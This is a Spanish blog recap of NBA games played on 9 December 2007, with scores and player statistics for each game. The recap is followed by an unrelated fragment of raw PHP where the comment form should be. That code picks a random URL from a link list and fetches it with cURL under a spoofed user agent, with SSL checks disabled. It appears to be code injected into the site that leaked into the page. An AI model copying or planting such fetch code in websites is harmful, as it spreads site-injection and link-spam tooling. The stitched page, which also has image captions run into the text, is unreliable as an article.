La crónica (9/12/07)

10 de December de 2007 por MagicJohnson32

La madrugada del domingo deparó buenas noticias para los Heat, que recuperaron al mejor Wade para vencer a los Clippers. En el mismo escenario, el Staples Center, Lakers y Warriors firmaron un partido mucho más atractivo y que contó con una estrella emergente, Andrew Bynum. Toronto y Houston abrieron fuego varias horas antes y aún seguimos preguntándonos qué diferencia a estos Rockets de los de Van Gundy. Los Pistons, por su parte, aplastaron a unos horribles Bobcats, mientras que Wizards superó a los Nets de la mano, como de costumbre, de Caron Butler. La emoción se concentró en Portland, con Roy y Aldridge como héroes locales, y en New Orleans, donde los honores correspondieron al gran Chris Paul.

Pasamos a resumir cada uno de los partidos disputados anoche:

Rockets 80 – 93 Raptorsfrancisdelfino

El regreso de Chris Bosh coincidió con una de las peores versiones de los Rockets, la que practica un juego vulgar y plano y que ni siquiera saca provecho del talento de sus dos estrellas. McGrady y Yao firmaron actuaciones bastante grises, pese a los 23 puntos del primero, y los texanos se vieron arrollados en la segunda mitad, en la que encajaron un 35-59. Bosh, con 21 puntos, 10 rebotes y 4 tapones, lideró el triunfo de los Raptors y tuvo sus mejores aliados entre los suplentes: Humphries, con 16 puntos y 9 rebotes; Delfino, con 12 y 8; Calderón, que cedió la titularidad a un mal TJ Ford y firmó 7 puntos, 6 asistencias y 3 rebotes; y Kapono, con 10 puntos. Los Rockets se ven tras esta derrota con un balance de 11-10, el mismo que los Raptors.

Heat 100 – 94 Clippers

Se quejaba Shaquille de que no recibía suficientes balones en ataque y por eso los Heat no ganaban partidos. En realidad, lo que necesitaban los de Florida era la recuperación de Wade. Eso, y tener enfrente un rival tan débil como los actuales Clippers. Los de Pat Riley se impusieron en el Staples Center a los Clippers con 35 puntos, 10 asistencias y 5 rebotes de Wade y pese a que O’Neal se quedó en 8 puntos. Haslem, con 17 puntos y 9 rebotes, y Ricky Davis, con otros 17, fueron las mejores contribuciones con las que contó Wade. En los Clippers Maggette y Kaman firmaron sendos dobles-dobles con 24-12 y 14-12 respectivamente, pero la paupérrima rotación con la que cuenta Dunleavy a un equipo que tiene a varios de sus mejores jugadores lesionados.

Bobcats 85 – 104 Pistons

Apenas un cuarto necesitaron los Pistons para demostrar a los Bobcats que la victoria se quedaría en el Auburn Hills. Un 16-30 de inicio puso a los locales en clara ventaja, y cuando parecía que los de Charlotte se meterían en el partido (52-57, en el tercer cuarto), los Pistons volvieron a asestar un duro golpe, esta vez en forma de parcial 10-24 para dejar el partido sentenciado. Destacó la noche negra de Gerald Wallace, que se limitó a 3 puntos, 1 rebotes y 1 asistencia. En el lado positivo, Billups anotó 20 puntos, y McDyess consiguió 19 y 9 rebotes. Apenas nadie se salvó por los Bobcats; en todo caso se puede destacar los minutos de Herrmann, que, con el partido sentenciado, logró 10 puntos, 4 rebotes y 2 robos.

roybucksBucks 113 – 117 Blazers

Bucks y Blazers jugaron anoche un 4 contra 4. Los cuatro de Portland (Roy, Aldridge, Outlaw y Blake) fueron mejores que los de Milwaukee (Williams, Redd, Villanueva y Bogut) y por eso la victoria se quedó en el Rose Garden. Liderados por un impecable Brandon Roy, autor de 26 puntos con 11 de 13 en tiros, 8 rebotes y 9 asistencias, los Blazers sobrevivieron tras una prórroga a los 33 puntos de Mo Williams, quien dispuso del lanzamiento para evitar los 5 minutos extra pero falló. Aldridge fue el mejor socio de Roy al lograr 24 puntos con 10 de 15 en tiros, además de los dos tiros libres que igualaron el partido a 15 segundos para el final del 4º periodo. Outlaw añadió 20 puntos y 5 rebotes desde el banquillo y Blake hizo 19 y 5 asistencias, mientras que por los Bucks, Bogut anotó 21 tantos, Villanueva añadió 19 y 9 rebotes, y Redd se fue hasta los 18 en una noche negada en los lanzamientos para el crack de los Bucks: 5 de 23.

Nets 89 – 104 Wizards

Los Wizards siguen demostrando un partido más que son capaces de ganar sin su líder, Gilbert Arenas. Comandados por otros dos grandes jugadores como Caron Butler y Antawn Jamison, están sacando los partidos adelante y manteniendo un balance del 50% de victorias. En el partido de anoche ambos volvieron a jugar un gran partido, sobre todo Butler, que con 20 de sus 28 puntos en la segunda parte aseguró una victoria que hasta el momento se había mostrado muy caprichosa, con constantes alternancias cp3dunken el marcador. Jamison aportó otros 20 puntos y añadió 10 rebotes, y el resto del quinteto también contribuyó con más de 10 puntos cada uno y jugando como un verdadero equipo. Por parte de los Nets, hubo nuevo triple doble de Jason Kidd, que se acerca ya al centenar, y muy buen partido de Vince Carter con 30 puntos. Falló sin embargo Richard Jefferson, que se quedó tan sólo en 9 puntos. A parte de estos jugadores, y a excepción de Nachbar, que anotó 19 puntos, el resto cuajó otra mala actuación y ninguno superó los 6 puntos.

Sonics 88 – 91 Hornets

Chris Paul continúa haciéndose un nombre en la NBA. Él, junto a Deron Williams, está llamado a formar parte del grupo de bases del futuro que sustituirán a jugadores como Jason Kidd o Steve Nash. Anoche volvió a liderar a su equipo ante las ausencias de Pedja Stojakovic y Mo Peterson y apuntaló la victoria con frialdad al transformar 2 tiros libres a falta un segundo para la finalización el encuentro. Antes de eso había conseguido darle la vuelta al marcador con un triple desde 8 metros y medio ante la mirada incredula de los jugadores de Seattle. Paul acabó el partido con 29 puntos y 10 asistencias, bien acompañado por David West con 15 puntos y 10 rebotes. Seattle no perdió de vista el encuentro en ningún momento e incluso consiguió ponerse por delante a falta de 4 minutos para el final gracias una vez más al rookie Kevin Durant, que camina con pasos agigantados directo al premio de Rookie del Año y que ayer volvió a anotar más de 20 puntos. A su lado, Chris Wilcox y Kurt Thomas fueron los más destacados de Seattle con sendos doble-dobles. Después de este partido New Orleans se mantiene como uno de los equipos más fuertes del Oeste.

Warriors 113 – 123 Lakerskobebaronfloor

Cuando juegas contra los Warriors tienes dos opciones: o te adaptas a su juego, o tratas de sacar provecho de él. Phil Jackson y los Lakers optaron por lo segundo y el resultado fue una victoria cimentada en la actuación de Andrew Bynum. El joven pívot no encontró rival cerca del aro y logró 20 puntos, igualando de este modo su mejor marca anotadora, 11 rebotes y 5 tapones. El gran inicio de Baron Davis mantuvo a los Warriors por encima. La igualdad fue la tónica dominante hasta que Lakers despegó con un parcial de 4-18 en el tercer cuarto. Los de Don Nelson se recuperaron y redujeron la diferencia a cuatro puntos 8:45 para el final, pero el regreso de Bryant a pista tras unos minutos de descanso acabó con la resistencia visitante, ya que Kobe, muy errático en sus tiros durante la primera mitad, lideró entonces un parcial de 4-17 que dejó el partido sentenciado. Bryant finalizó con 28 puntos, 8 asistencias, 6 rebotes y 3 robos, y junto a Bynum encabezó a otros cinco jugadores en dobles figuras en anotación, entre ellos Ariza, que volvió a rendir a buen nivel, y Turiaf, que regresó tras ser baja los dos últimos partidos. En los Warriors, Baron Davis hizo 20-8-7-4, y Jackson logró 18 puntos, pero ambos con porcentajes discretos y tan sólo Ellis y Pietrus les acompañaron por encima de los 10 puntos.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>